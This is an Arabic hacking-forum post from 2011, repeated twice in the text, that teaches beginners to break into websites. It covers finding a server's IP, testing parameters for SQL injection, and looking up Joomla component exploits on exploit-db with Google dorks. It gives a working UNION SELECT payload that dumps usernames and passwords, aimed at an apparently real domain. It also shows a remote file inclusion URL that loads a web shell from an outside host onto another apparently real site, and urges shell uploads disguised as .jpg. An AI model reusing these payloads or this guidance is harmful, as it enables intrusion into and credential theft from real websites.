lord_kwk
03-01-2011, 01:49 PM
السلام عليكم ورحمة الله وبركاته طبعا بعد غياب طويل عن المنتدى لاخذ دورات في هكر وقد تخطيت مرحلة الابتدائية واصبحت في المتوسطة في الهكر
احب اعطي الدروس اللي تخليك تطلع من الابتدائية !
1-انا ادور بقوقل رفع الشل اكتب رفع الشل يطلعلي ثغرات ياخي شهالحال ؟
اوك انا اقولك شسالفه!
الثغرات انواع :
1-الفايل انكلود
2-الفايل ابلود
sql
xss
هذول اللي انا بخترق فيهم
طبعا في ملياان انواع ثغرات بس هذول موجودين باغلب المواقع
طيب لورد هوا انا علي احفظ هاد كلو ؟؟
طيب لورد والله هيك صعب!
ياخي انا ماقلتلك احفظ
طبعا معروف انو في موقع للثغرات اسمو ميلورم
(وتسكر)
نزل بديل بس هاد البديل فيه كل ثغارت الميلورم ومطور اكتر
http://www.exploit-db.com/
طبعا طرق الاستغلال نفسها للي كان يعرف الموقع القديم واللي ما يعرف مممم؟؟؟؟
منعلمو ^_^
طبعا جميع الحقوق محفوظه لمنتديات جيوش الهكرز
طبعا من كثر ما دورت شروحات اشوف انو احيانا الصور ما تظهر لذلك رح اشرح كتابة وصور ^_^
صورة الموقع
http://www2.0zz0.com/2011/03/01/09/957129154.jpg
طيب اول شي رح نشرح كيف نشوف الثغرة الللي بدنا ياها
مندخل الموقع اللي بدنا نخترقو اذا ما كان مركب سكربت شو نعمل نقفل !
لالا اوعى
منطلع الاي بي تبع السيرفر
ممم كيف؟
انا بقلك
افتح رن او تشغيل او شاشة الدوس مثل ما بقولو
اكتب cmd
jفتح عندك شاشة الاوامر
لا لورد تكفى لا تفوتنا بالحيط ما بدنا اوامر
ياعمي اهدى بس انسخ والصق انت وما عليك
لما تفتح الشاشة السودة
اكتب او انسخ
ping google.com
طيب مكان google.com
منحط موقعنا مثلا بدنا نخترق يوتيوب منحط الموقع بدون www
بتصير هيك
ping youtube.com
لاتنسو الفراغ اللي بالنص
بيطلعلك الاي بي
متل هيك
http://www2.0zz0.com/2011/03/01/09/456633344.jpg
غلطبت بالنسخ انا سموحة يالاعضاء لنسخ الايبي رايت كلك تحديد علامة
بعدين من زاوية نافذه الشاشة السودة رايت كلك بعدين تحرير بعدبن نسخ ^_^
يالله والله تعبت من الكتابة
يالله لعيون الاعضاء منكمل
طيب لورد شو بفيدنا اي بي السيرفر ؟
انا بقلك بفيدك انك بتقدر تطلع السكربتات اللي مركبها على موقعو او مواقع من سيرفرو
وين نروح ؟
روح www.msn.com
شو اسوي هناك ؟
حط هيك
ip :74.125.127.93 id
الشرح
ip :74.125.127.93
معناتها اي بي السيرفر
id عشان نشوف مصاب بالsql
لو بدنا نعرف مصاب ولا لا
منحط ورا id=1مثلا
علامة '
بس ورح يطلعلك سيكيو ال ايرور او تختفي صوره او تحس في تغير بالموقع
طبعا للستغلال رح ريحك من الاستغلال اليدوي نزل برنامج هافيج واكتب شرحو موجود بالمنتدى جيوش الهكرز او شوفو على قوقل
طيب لو مو مصاب نقعد ندور على سكربتات مركبة بالموقع كيف ؟
ممم ادخل الموقع دور بالصفحات بلكي تلاقي سكربت جوملا او وورد بريس او ديجي شات مليان ثغرات
طيب لنفترض انو لقينا ثغرة جوملا شو نعمل انا بقلك روح exploit-db.com
في search
اضغط عليها
وتابع
http://www2.0zz0.com/2011/03/01/09/243070866.jpg
تكفون عطوني استراحة:tongue:
طيب بعد ما حطينا سيرش طلعلنا الثغرات
شباب لا تروحو استنو انا عارف انو نصكم قال زهق بكرا بكمل يعمي استنا يمكن تتعلم تخترق اليوم ^_^
هلا بطلعنا صفحه مليانة ثغرات عن السيكربتjoomla
طيب كيف نستغل االله يستر انا رح اختار وحده عشوائيه
http://www2.0zz0.com/2011/03/01/10/709116383.jpg
بعد ما دخلنا عالثغرة اللي هيي رابطها http://www.exploit-db.com/exploits/15610/
نشوف المعطيات
http://www2.0zz0.com/2011/03/01/10/976152696.jpg
[+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"
dork معناها انو الرابط اللي وراها نبحث عنو فقوقل او بالموقع اللي بتحب تبحث فيو
================================================== ========================
[+] exploit:
http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
هاد الاستغلال طيب شو هاد يا لورد فهمنا مممم انا بقللكم
http://127.168.1.1 معناها رابط الموقع
هي الثغرة اللي بحثنا عنها /index.php?option=com_jeajaxeventcalendar
حط وراها &view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
بصير متل هاد الرابط مثلا ادخلو استغلو ^_^
https://defend.ht/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat%28username,0x3a,password%29,4/**/from/**/jos_users
طيب هيك عرفنا نستغل ال sql
والفايل انكلود يا لورد مممم والله انا تعبان بس يالله
هي رابط ثغرة انكلود http://www.exploit-db.com/exploits/15814/
.:. Dork : inurl:"com_ponygallery"
################################################## ##################
===[ Exploit ]===
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path =[shell.txt?]
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]
شو معناة هالكلام طبعا متل الشرح اللي فوق تبحث عن الدورك
بس ضل شي جديد احنا هون بدنا نرفع الشل للاختراق طبعا بشدد الف مره حتى هوا كاتبلك[shell.txt
معناها انو الشل لازم يكون بامتداد txtبس طبعا انا اضبطكم خدو هاد شل تكست
http://www.theittihad.com/newupload/vndqilbmrjkp.txt
بس ضل شي مهم جدا بدونو ولا كانك عملت شي
علامة ?
? هي العلامة لازم تكون موجوده ورا لشل
لنعطيكم رابط مرفوع دققيقه لنعطيكم
http://www.domovina-g-hrgovi.com/administrator/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=http ://www.theittihad.com/newupload/vndqilbmrjkp.txt?
يالله كيفو
هيك شرحنا ثغرتين صحيح طولنا بس ان شاء الله تكونو فهمتو
مع اني تعبت بس رح اشرحلكم اسهل ثغرة اللي هيه فايل ابلود
هي رابط ثغرة انتو افهموه لانو راسي انفجر http://www.exploit-db.com/exploits/12700/
طبعا ابحثو عن الدورك وبقللكم ارفعو الشل بامتداد jpg
جميع الحـ قوق محفوظه لمنتديات
اخوكم LoRd_kwk
[email protected]
^_^
:redface::redface::redface::redface:
مرفق مع الشرح شل عشان تجربو الفايل ابلود ^_^1208
احب اعطي الدروس اللي تخليك تطلع من الابتدائية !
1-انا ادور بقوقل رفع الشل اكتب رفع الشل يطلعلي ثغرات ياخي شهالحال ؟
اوك انا اقولك شسالفه!
الثغرات انواع :
1-الفايل انكلود
2-الفايل ابلود
sql
xss
هذول اللي انا بخترق فيهم
طبعا في ملياان انواع ثغرات بس هذول موجودين باغلب المواقع
طيب لورد هوا انا علي احفظ هاد كلو ؟؟
طيب لورد والله هيك صعب!
ياخي انا ماقلتلك احفظ
طبعا معروف انو في موقع للثغرات اسمو ميلورم
(وتسكر)
نزل بديل بس هاد البديل فيه كل ثغارت الميلورم ومطور اكتر
http://www.exploit-db.com/
طبعا طرق الاستغلال نفسها للي كان يعرف الموقع القديم واللي ما يعرف مممم؟؟؟؟
منعلمو ^_^
طبعا جميع الحقوق محفوظه لمنتديات جيوش الهكرز
طبعا من كثر ما دورت شروحات اشوف انو احيانا الصور ما تظهر لذلك رح اشرح كتابة وصور ^_^
صورة الموقع
http://www2.0zz0.com/2011/03/01/09/957129154.jpg
طيب اول شي رح نشرح كيف نشوف الثغرة الللي بدنا ياها
مندخل الموقع اللي بدنا نخترقو اذا ما كان مركب سكربت شو نعمل نقفل !
لالا اوعى
منطلع الاي بي تبع السيرفر
ممم كيف؟
انا بقلك
افتح رن او تشغيل او شاشة الدوس مثل ما بقولو
اكتب cmd
jفتح عندك شاشة الاوامر
لا لورد تكفى لا تفوتنا بالحيط ما بدنا اوامر
ياعمي اهدى بس انسخ والصق انت وما عليك
لما تفتح الشاشة السودة
اكتب او انسخ
ping google.com
طيب مكان google.com
منحط موقعنا مثلا بدنا نخترق يوتيوب منحط الموقع بدون www
بتصير هيك
ping youtube.com
لاتنسو الفراغ اللي بالنص
بيطلعلك الاي بي
متل هيك
http://www2.0zz0.com/2011/03/01/09/456633344.jpg
غلطبت بالنسخ انا سموحة يالاعضاء لنسخ الايبي رايت كلك تحديد علامة
بعدين من زاوية نافذه الشاشة السودة رايت كلك بعدين تحرير بعدبن نسخ ^_^
يالله والله تعبت من الكتابة
يالله لعيون الاعضاء منكمل
طيب لورد شو بفيدنا اي بي السيرفر ؟
انا بقلك بفيدك انك بتقدر تطلع السكربتات اللي مركبها على موقعو او مواقع من سيرفرو
وين نروح ؟
روح www.msn.com
شو اسوي هناك ؟
حط هيك
ip :74.125.127.93 id
الشرح
ip :74.125.127.93
معناتها اي بي السيرفر
id عشان نشوف مصاب بالsql
لو بدنا نعرف مصاب ولا لا
منحط ورا id=1مثلا
علامة '
بس ورح يطلعلك سيكيو ال ايرور او تختفي صوره او تحس في تغير بالموقع
طبعا للستغلال رح ريحك من الاستغلال اليدوي نزل برنامج هافيج واكتب شرحو موجود بالمنتدى جيوش الهكرز او شوفو على قوقل
طيب لو مو مصاب نقعد ندور على سكربتات مركبة بالموقع كيف ؟
ممم ادخل الموقع دور بالصفحات بلكي تلاقي سكربت جوملا او وورد بريس او ديجي شات مليان ثغرات
طيب لنفترض انو لقينا ثغرة جوملا شو نعمل انا بقلك روح exploit-db.com
في search
اضغط عليها
وتابع
http://www2.0zz0.com/2011/03/01/09/243070866.jpg
تكفون عطوني استراحة:tongue:
طيب بعد ما حطينا سيرش طلعلنا الثغرات
شباب لا تروحو استنو انا عارف انو نصكم قال زهق بكرا بكمل يعمي استنا يمكن تتعلم تخترق اليوم ^_^
هلا بطلعنا صفحه مليانة ثغرات عن السيكربتjoomla
طيب كيف نستغل االله يستر انا رح اختار وحده عشوائيه
http://www2.0zz0.com/2011/03/01/10/709116383.jpg
بعد ما دخلنا عالثغرة اللي هيي رابطها http://www.exploit-db.com/exploits/15610/
نشوف المعطيات
http://www2.0zz0.com/2011/03/01/10/976152696.jpg
[+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"
dork معناها انو الرابط اللي وراها نبحث عنو فقوقل او بالموقع اللي بتحب تبحث فيو
================================================== ========================
[+] exploit:
http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
هاد الاستغلال طيب شو هاد يا لورد فهمنا مممم انا بقللكم
http://127.168.1.1 معناها رابط الموقع
هي الثغرة اللي بحثنا عنها /index.php?option=com_jeajaxeventcalendar
حط وراها &view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
بصير متل هاد الرابط مثلا ادخلو استغلو ^_^
https://defend.ht/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat%28username,0x3a,password%29,4/**/from/**/jos_users
طيب هيك عرفنا نستغل ال sql
والفايل انكلود يا لورد مممم والله انا تعبان بس يالله
هي رابط ثغرة انكلود http://www.exploit-db.com/exploits/15814/
.:. Dork : inurl:"com_ponygallery"
################################################## ##################
===[ Exploit ]===
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path =[shell.txt?]
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]
شو معناة هالكلام طبعا متل الشرح اللي فوق تبحث عن الدورك
بس ضل شي جديد احنا هون بدنا نرفع الشل للاختراق طبعا بشدد الف مره حتى هوا كاتبلك[shell.txt
معناها انو الشل لازم يكون بامتداد txtبس طبعا انا اضبطكم خدو هاد شل تكست
http://www.theittihad.com/newupload/vndqilbmrjkp.txt
بس ضل شي مهم جدا بدونو ولا كانك عملت شي
علامة ?
? هي العلامة لازم تكون موجوده ورا لشل
لنعطيكم رابط مرفوع دققيقه لنعطيكم
http://www.domovina-g-hrgovi.com/administrator/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=http ://www.theittihad.com/newupload/vndqilbmrjkp.txt?
يالله كيفو
هيك شرحنا ثغرتين صحيح طولنا بس ان شاء الله تكونو فهمتو
مع اني تعبت بس رح اشرحلكم اسهل ثغرة اللي هيه فايل ابلود
هي رابط ثغرة انتو افهموه لانو راسي انفجر http://www.exploit-db.com/exploits/12700/
طبعا ابحثو عن الدورك وبقللكم ارفعو الشل بامتداد jpg
جميع الحـ قوق محفوظه لمنتديات
اخوكم LoRd_kwk
[email protected]
^_^
:redface::redface::redface::redface:
مرفق مع الشرح شل عشان تجربو الفايل ابلود ^_^1208